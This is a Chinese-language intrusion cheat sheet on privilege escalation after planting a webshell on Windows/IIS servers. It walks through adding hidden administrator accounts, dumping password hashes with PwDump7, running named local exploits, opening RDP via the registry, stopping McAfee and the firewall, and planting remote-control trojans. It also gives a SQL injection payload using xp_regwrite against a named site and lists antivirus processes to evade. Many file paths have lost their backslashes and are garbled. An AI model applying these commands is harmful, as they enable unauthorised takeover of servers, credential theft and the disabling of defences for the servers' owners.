提权思路
【1. 能不能执行 cmd 就看这个命令:net user,net 不行就用 net1,再不行就上传一个 net 到可写可读目录,执行 /c c:windowstempcookiesnet1.exe user
2. 当提权成功,3389 没开的情况下,上传开 3389 的 vps 没成功时,试试上传 rootkit.asp 用刚提权的用户登录进去就是 system 权限,再试试一般就可以了。
3.cmd 拒绝访问的话就自己上传一个 cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。
4.cmd 命令:systeminfo,看看有没有 KB952004、KB956572、KB970483 这三个补丁,如果没有,第一个是 pr 提权,第二个是巴西烤肉提权,第三个是 iis6.0 提权。
6.c:windowstempcookies 这个目录
7. 找 sa 密码或是 root 密码,直接利用大马的文件搜索功能直接搜索,超方便!
8.cmd 执行 exp 没回显的解决方法:com 路径那里输入 exp 路径 C:RECYCLERpr.exe,命令那里清空 (包括 /c ) 输入”net user jianmei daxia /add”
9. 增加用户并提升为管理员权限之后,如果连接不上 3389,上传 rootkit.asp 脚本,访问会提示登录,用提权成功的账号密码登录进去就可以拥有管理员权限了。
10. 有时变态监控不让添加用户,可以尝试抓管理哈希值,上传“PwDump7 破解当前管理密码 (hash 值)”,俩个都上传,执行 PwDump7.exe 就可以了,之后到网站去解密即可。
11. 有时增加不上用户,有可能是密码过于简单或是过于复杂,还有就是杀软的拦截,命令 tasklist 查看进程
12. 其实星外提权只要一个可执行的文件即可,先运行一遍 cmd,之后把星外 ee.exe 命名为 log.csv 就可以执行了。
13. 用 wt.asp 扫出来的目录,其中红色的文件可以替换成 exp,执行命令时 cmd 那里输入替换的文件路径,下面清空双引号加增加用户的命令。
14. 提权很无奈的时候,可以试试 TV 远控,通杀内外网,穿透防火墙,很强大的。
15. 当可读可写目录存在空格的时候,会出现这样的情况:’Cocuments’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互 shell 切换到 exp 路径,如:Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目录 然后再执行 exp 或者 cmd,就不会存在上面的情况了,aspshell 一般是无法跳转目录的~
16. 有时候可以添加用户,但是添加不到管理组,有可能是 administrators 改名了,net user administrator 看下本地组成员,*administrators
17. 进入服务器,可以继续内网渗透 这个时候可以尝试打开路由器 默认帐号密码 admin admin
18. 有的 cmd 执行很变态,asp 马里,cmd 路径填上面,下面填:””c:xxxexp.exe “whoami” 记得前面加两个双引号,不行后面也两个,不行就把 exp 的路径放在 cmd 那里,下面不变。
19. 一般增加不上用户,或是想添加增加用户的 vbs,bat, 远控小马到服务器的启动项里,用“直接使服务器蓝屏重启的东东”这个工具可以实现,
20. 执行 PwDump7.exe 抓哈希值的时候,建议重定向结果到保存为 1.txt /c c:windowstempcookiesPwDump7.exe >1.txt
21. 菜刀执行的技巧,上传 cmd 到可执行目录,右击 cmd 虚拟终端,help 然后 setp c:windowstempcmd.exe 设置终端路径为:c:windowstempcmd.exe
22. 当不支持 aspx,或是支持但跨不了目录的时候,可以上传一个读 iis 的 vps,执行命令列出所有网站目录,找到主站的目录就可以跨过去了。 上传 cscript.exe 到可执行目录,接着上传 iispwd.vbs 到网站根目录,cmd 命令 /c “c:windowstempcookiescscript.exe” d:webiispwd.vbs
23. 如何辨别服务器是不是内网?
192.168.x.x 172.16.x.x 10.x.x.x
(( dos 命令大全 ))
查看版本:ver 查看权限:whoami
查看配置:systeminfo 查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
查看开放的所有端口:netstat -ano
查询管理用户名:query user
查看搭建环境:ftp 127.0.0.1
查看指定服务的路径:sc qc Mysql
添加一个用户:net user jianmei daxia.asd /add
提升到管理权限:net localgroup administrators jianmei /add
添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用户信息:net user jianmei
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add
突破最大连接数:mstsc /admin /v:127.0.0.1
删除用户:net user jianmei /del
删除管理员账户 :net user administrator daxia.asd
更改系统登陆密码:net password daxia.asd
激活 GUEST 用户:net user guest /active:yes
开启 TELNET 服务:net start telnet
关闭麦咖啡:net stop “McAfee McShield”
关闭防火墙:net stop sharedaccess
查看当前目录的所有文件:dir c:windows
查看制定文件的内容:type c:windows1.asp
把 cmd.exe 复制到 c:windows 的 temp 目录下并命名为 cmd.txt:copy c:windowstempcookiescmd.exe c:windowstempcmd.txt
开 3389 端口的命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 查看补丁:dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt (( SQL 语句直接开启 3389 ))
3389 登陆关键注册表位置:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections 其中键值 DenyTSConnections 直接控制着 3389 的开启和关闭,当该键值为 0 表示 3389 开启,1 则表示关闭。 而 MSSQL 的 xp_regwrite 的存储过程可以对注册进行修改,我们使用这点就可以简单的修改 DenyTSConnections 键值,从而控制 3389 的关闭和开启。
开启 3389 的 SQL 语句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
关闭 3389 的 SQL 语句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
(( 常见杀软 ))
360tray.exe 360 实时保护 ZhuDongFangYu.exe 360 主动防御 KSafeTray.exe 金山卫士 McAfee McShield.exe 麦咖啡 SafeDogUpdateCenter.exe 服务器安全狗